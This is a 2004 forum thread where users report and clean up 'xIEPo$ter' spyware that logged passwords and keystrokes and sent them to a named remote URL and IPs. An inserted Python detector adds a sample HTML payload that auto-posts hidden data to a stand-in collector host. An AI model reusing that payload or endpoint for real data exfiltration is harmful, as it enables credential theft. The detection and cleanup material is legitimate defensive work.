Fizban1
Cadet
Joined: Apr 14, 2004
Posts: 4
Location: USA
Posted: Wed Apr 14, 2004 4:20 am Post subject:

thank you tony, I like veil have been havin this xiepo$ter junk, thanks to your post on how to fix it I'm free from its grasp, I wish to thank you from the bottom of my heart =D
xiepo$ter would increase in numbers btw as long as your comp was running, I've gotten up to 12 of it doin this.
thank you again tony, I am glad I stumbled across this post while looking for ways to fix this =D
*edit* sigh, seems to be another one like it, but this one comes up with random letters each time =(
*edit again*, it also keeps changing homepage to about:blank
|
Fizban1
Cadet
Joined: Apr 14, 2004
Posts: 4
Location: USA
Posted: Wed Apr 14, 2004 2:56 pm Post subject:

fix didn't work, lil buggers still there =(, plus there's this file called cjagnj, said it was created april 12, 2004, cept no program we have uses it, try to run a virus scan, crashes desktop, try to delete it, says windows is using it, try moving it, same thing windows using it, using windows 95 2nd edition.
the thing veil mentioned keeps comin up as 2 different things, xiepo$ter, and some random letters scrambled together, tried what you mentioned and for this computer it sadly didn't work =(, can't find anything remotely close to where it is hidden, whoever created this little devil did a good job =(, done its job to anger me severely
any help would be greatly appreciated and you will have my heartfelt thank you
|
War1980
Cadet
Joined: Apr 15, 2004
Posts: 1
Location: USA
Posted: Thu Apr 15, 2004 3:09 am Post subject: Same issue

I followed the steps to remove the xiepo$ter, and it worked. Like the original poster, I was having an application that was having to be forcibly closed, Lbjlck32.exe.
After taking the steps outlined, I am able to delete/move the Lbjlck32.exe out from c:\windows\system32 and the xiepo$ter no longer loads on start up.
If you would like a copy of these files or any logs, I would be glad to supply them.
This was the second toughest issue I've had to deal with, Newdot.net being the biggest pain in the ass I've ever dealt with.
|
Fizban1
Cadet
Joined: Apr 14, 2004
Posts: 4
Location: USA
Posted: Thu Apr 15, 2004 6:50 am Post subject:

*edit* thanks to a friend I learned how to scan my registry files and delete the nasties in there, he also taught me how to delete stuff in dos that can't be deleted when you're in windows, so all in all, problem solved,
average it came up every 15-30 minutes, been an hour and xiepo$ter free! =D
thanks tony for the fix, I'm not sure which thing did it, your fix or the tampering with the nasty registry files, either way, here's the heartfelt thank you I mentioned in my first post,
thank you from the bottom of my heart
Last edited by Fizban1 on Thu Apr 15, 2004 11:07 pm, edited 1 time in total
|
MikeCC
Cadet
Joined: Apr 14, 2004
Posts: 1
Location: USA
Posted: Thu Apr 15, 2004 10:11 pm Post subject: Fix worked for me

First, let me thank all of those who contributed to this thread...and especially the man with the cure!! I had never been to this site before, a Google search for xIEPo$ter brought me here...
I had xIEPo$ter on my Windows 2000 laptop...and the regedit fix got rid of it...
I didn't experience the unclosable application part of it...so I'm going to look for those files to see if they may be lurking.
Thanks again
Mike
|
onceoffhelp
Cadet
Joined: Apr 16, 2004
Posts: 1
Location: Uk
Posted: Fri Apr 16, 2004 5:36 am Post subject: I fixed it manually on XP

Hi, I have just looked at my parents' machine which has the same xiepo$ter1 and xiepo$ter2 problem. It's running XP with SP1. There was also a problem I found with another that seemed to be linked called x-okrecv (and then a number at the end).
I noticed that when XP shut down it said it was ending a task called HJOFJDEI.EXE which didn't sound like a Microsoft file. I have not been able to delete this file, however I managed to rename it to a.aaa.
Since I have done this the machine has worked fine and the htm files have stopped loading.
Hope this helps
(sorry I can't remember where HJOFJDEI.exe was located, however I am sure you can search for it)
|
Fizban1
Cadet
Joined: Apr 14, 2004
Posts: 4
Location: USA
Posted: Fri Apr 16, 2004 12:15 pm Post subject:

hmm, it would seem whenever xiepo$ter ends up on your computer the parent file is different each time, for me I had cmbdl32 and another thing like xiepo$ter with random letters had the parent file cjagnj, so I guess it's different whenever it ends up on your comp
|
Shuttie
Cadet
Joined: Apr 18, 2004
Posts: 5
Location: Belgium
Posted: Sun Apr 18, 2004 2:55 pm Post subject: More Info

What seems to happen is this:
1/ A program creates a temporary htm document, in your c:\windows temp directory.
2/ This creates a file called xIEPo$terx.htm under "My Computer"
(the x increments by one every 10 minutes)
3/ This document runs itself to create another file with the name "X-okRecv11" and sends it to IP address 65.75.157.147 / 65.75.157.140
It does this every 10 minutes.
I guess it is telling someone you are on-line?
Who is at IP 167.75.157.147?
I had to do all three activities advised, but it has been some time before it last happened - so thanks very much to all !!!
**EDIT** grrr 10 minutes later it started again !!!
Any ideas?
I have sent all relevant files to you.
Thanks very much in advance!
Last edited by Shuttie on Mon Apr 19, 2004 2:45 pm, edited 2 times in total
|
Shuttie
Cadet
Joined: Apr 18, 2004
Posts: 5
Location: Belgium
Posted: Mon Apr 19, 2004 2:39 pm Post subject: Additional Info

I have tried Adware, and SpyBot.
Both cleared out a lot of bad files.
But whilst it does not seem to send the file on the internet, it does still create the temporary files.
Any ideas?
|
Shuttie
Cadet
Joined: Apr 18, 2004
Posts: 5
Location: Belgium
Posted: Mon Apr 19, 2004 2:40 pm Post subject: Additional Info

** Update 20/04/04 - 18:50 Central European Time
I don't know what finally did it, but I updated the spybot program, and adware.
One of them must have cleared it, as it hasn't returned for 24 hours
Last edited by Shuttie on Wed Apr 21, 2004 12:42 am, edited 1 time in total
|
netscorp
Cadet
Joined: Apr 20, 2004
Posts: 1
Location: USA
Posted: Tue Apr 20, 2004 5:09 pm Post subject: Help I have the xIEPo$ter problem as well

Thank heavens that you guys (and gals) are out there. I have been fighting this thing all day and have been unable to find anything on this problem until I stumbled upon the posts on this site.
I have run a couple of spyware programs but that doesn't seem to fix it. How can I remedy this? Any ideas?
Thanks
|
jimmy_w18
Cadet
Joined: Apr 21, 2004
Posts: 1
Location: Australia
Posted: Wed Apr 21, 2004 8:15 am Post subject: I think this thing is a bit nastier than first thought!!!

Hi Guys and Girls, a quick rundown on what I have found on my system regarding the xIEPo$ter annoyance. It gets real interesting down the bottom of this post.....
I have 255 instances of the xIEPo$ter???.htm file in my 'My Computer' folder which have been created at 10 or 20 minute intervals, and one log file on the desktop which I have already deleted so I can't comment on it. These each have code linking to files in my 'Temp' directory with all sorts of names like 'qklcaocc.htm'. These files have html code in them posting data to 'http://ussrforeva.com/ppslog.php'.
Also there are two files in my 'system32' folder, one named 'Mimfaihb.exe' and the other 'Dbdoja32.dll' which I am sure are related to this problem. They were both created on the same date at the same time. The file 'Dbdoja32.dll' also had its own registry entry.
Now for the interesting thing!!!!!
In the 'system32' folder I also found two .dat files called 'tt32.dat' and 'clctk.dat' which contained MY unames, passwords to websites, ebay passwords and tracking, all sorts of info on websites I have been to, keystroke recordings (by the looks of it), all sorts of stuff you don't really want other people to have!!!
So I'm guessing that when they send to the IP someone has already mentioned, they are not checking to see if you are online, but are receiving all our password and data that has been collected in these files. Please someone tell me that I'm wrong!
If anyone can find a way to completely kill this thing I will be grateful, I will also post anything else I find here.
Later guys........
|
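Added example, not part of any poster's message or the site's tooling: a small triage routine for the .htm files described in the posts above (Shuttie's xIEPo$terx.htm / X-okRecv names, jimmy_w18's randomly named Temp files containing HTML that posts data to a remote URL). The function names, the `.submit(` heuristic for "runs itself", and the sample host are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# File names as reported in the thread (posters' spellings vary in case).
NAME_PATTERN = re.compile(r"^(xiepo\$ter\d*\.htm$|x-okrecv\d+)", re.I)
AUTO_SUBMIT = re.compile(r"\.submit\s*\(")  # assumption: page posts itself via script

class FormScan(HTMLParser):
    """Collects hosts of absolute-URL POST forms and counts hidden fields."""
    def __init__(self):
        super().__init__()
        self.remote_posts, self.hidden = [], 0

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and a.get("method", "get").lower() == "post":
            host = urlparse(a.get("action", "")).hostname
            if host:  # absolute URL: the data leaves the machine
                self.remote_posts.append(host)
        elif tag == "input" and a.get("type", "").lower() == "hidden":
            self.hidden += 1

def triage(filename, html):
    """Return the reasons a file resembles what the posters describe."""
    scan = FormScan()
    scan.feed(html)
    reasons = []
    if NAME_PATTERN.match(filename):
        reasons.append("name matches a pattern reported in the thread")
    if scan.remote_posts and AUTO_SUBMIT.search(html):
        reasons.append("self-submitting POST to " + ", ".join(scan.remote_posts))
    if scan.remote_posts and scan.hidden:
        reasons.append(f"{scan.hidden} hidden field(s) posted to a remote host")
    return reasons

# Constructed samples, not captured from an infected machine.
SAMPLES = {
    "xIEPo$ter12.htm": '<body onload="document.forms[0].submit()">'
        '<form method="POST" action="http://collector.example.invalid/log.php">'
        '<input type="hidden" name="d" value="x"></form></body>',
    "notes.htm": '<body><form method="post" action="/search">'
        '<input type="text" name="q"></form></body>',
}

def scan_samples():
    return {name: triage(name, html) for name, html in SAMPLES.items()}

if __name__ == "__main__":
    for name, reasons in scan_samples().items():
        print(name, reasons or "no match")
```

Because the Temp files have random names, the content checks matter more than the name check; a file that only matches by name still deserves a look at what created it.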
Shuttie
Cadet
Joined: Apr 18, 2004
Posts: 5
Location: Belgium
Posted: Thu Apr 22, 2004 12:57 am Post subject: Fix

I can't say which one of these actions fixed the problem, but this is what I did....
a) I downloaded the "HijackThis" file from http://computercops.biz/downloads-cat-14.html
b) Ran CWShredder http://computercops.biz/downloads-cat-14.html
c) Copied the contents of the Quote box to Notepad, and saved as Remove.reg (save as type: 'all files')
Double-click Remove.reg, and answer yes when asked to have its contents added to the Registry. (see quote below)
d) I then downloaded and ran "Adware" (I also updated the latest data file)
http://computercops.biz/downloads-cat-14.html
e) And I downloaded and ran "Spybot" (again using latest data file)
After re-booting the machine, it seems to have stopped.
I don't know which one finally fixed it, but I would do everything just in case, especially if there is a chance of it copying your key strokes.
Hope that works for you!
|
OpaOpa
Cadet
Joined: Apr 26, 2004
Posts: 1
Location: Brazil
Posted: Mon Apr 26, 2004 4:48 am Post subject:

I'm having the same problem with xPo$terxx.htm. When I'm running some game or anything that requires fullscreen, from time to time, it suddenly minimizes. When I press CTRL+ALT+DEL, there's an "Iexplore" running. It always appears.
Anyway, I checked what jimmy_w18 said about the password files... and I found them. Not the same filenames though. On my /SYSTEM folder, there's this file named glumx32.dat, which updates from time to time. I opened it with the NOTEPAD, and found every uname and password I ever used since I first connected. Stuff I didn't even remember, that I used years ago and probably doesn't even work was there. Its last entry was the uname to this forum, and it updated right after I registered. It's even got my last Google searches...
Yeah, that freaked me out.
Powered by phpBB 2.0.8a © 2001 phpBB Group
Version 2.0.6 of PHP-Nuke Port by Tom Nitzschner © 2002 www.toms-home.com
Version 2.2 by Paul Laudanski © 2003-2004 Computer Cops